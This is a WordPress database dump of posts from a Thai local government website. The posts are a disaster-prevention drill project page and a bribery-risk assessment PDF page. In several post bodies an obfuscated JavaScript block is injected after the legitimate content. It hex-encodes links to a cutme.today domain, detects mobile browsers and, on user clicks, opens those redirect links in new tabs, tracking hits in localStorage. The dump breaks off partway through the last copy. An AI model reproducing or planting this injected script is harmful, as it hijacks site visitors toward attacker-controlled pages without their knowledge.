(1031,1,'2024-08-21 09:57:03','2024-08-21 02:57:03','<!-- wp:image {\"id\":1030,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/30-2567-724x1024.png\" alt=\"\" class=\"wp-image-1030\"/></figure>\n<!-- /wp:image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','โครงการโครงการซ้อมแผนปฏิบัติการป้องกันและบรรเทาสาธารณะภัย ประจำปีงบประมาณ 2567','','inherit','closed','closed','','1029-revision-v1','','','2024-08-21 09:57:03','2024-08-21 02:57:03','',1029,'http://pakhaeng.ssk.in.th/?p=1031',0,'revision','',0),
(1032,1,'2024-08-21 09:58:51','2024-08-21 02:58:51','<!-- wp:file {\"id\":1497,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน.pdf\",\"displayPreview\":true} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน\"></object><a id=\"wp-block-file--media-163fd88a-2892-4102-9f31-5f5f9ba02002\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน.pdf\" target=\"_blank\" rel=\"noreferrer noopener\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-163fd88a-2892-4102-9f31-5f5f9ba02002\">Download</a></div>\n<!-- /wp:file -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน','','publish','closed','closed','','%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b9%80%e0%b8%aa%e0%b8%b5%e0%b9%88%e0%b8%a2%e0%b8%87%e0%b8%81%e0%b8%b2','','','2025-07-01 09:26:01','2025-07-01 02:26:01','',0,'http://pakhaeng.ssk.in.th/?page_id=1032',0,'page','',0),
(1033,1,'2024-08-21 09:58:34','2024-08-21 02:58:34','','การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน','','inherit','','closed','','%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b9%80%e0%b8%aa%e0%b8%b5%e0%b9%88%e0%b8%a2%e0%b8%87%e0%b8%81%e0%b8%b2','','','2024-08-21 09:58:34','2024-08-21 02:58:34','',1032,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน.pdf',0,'attachment','application/pdf',0),
(1034,1,'2024-08-21 09:58:51','2024-08-21 02:58:51','<!-- wp:file {\"id\":1033,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน.pdf\",\"displayPreview\":true} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน\"></object><a id=\"wp-block-file--media-a2ec17cf-db58-4c50-980d-1c31a2ed56a0\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน.pdf\" target=\"_blank\" rel=\"noreferrer noopener\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-a2ec17cf-db58-4c50-980d-1c31a2ed56a0\">Download</a></div>\n<!-- /wp:file -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a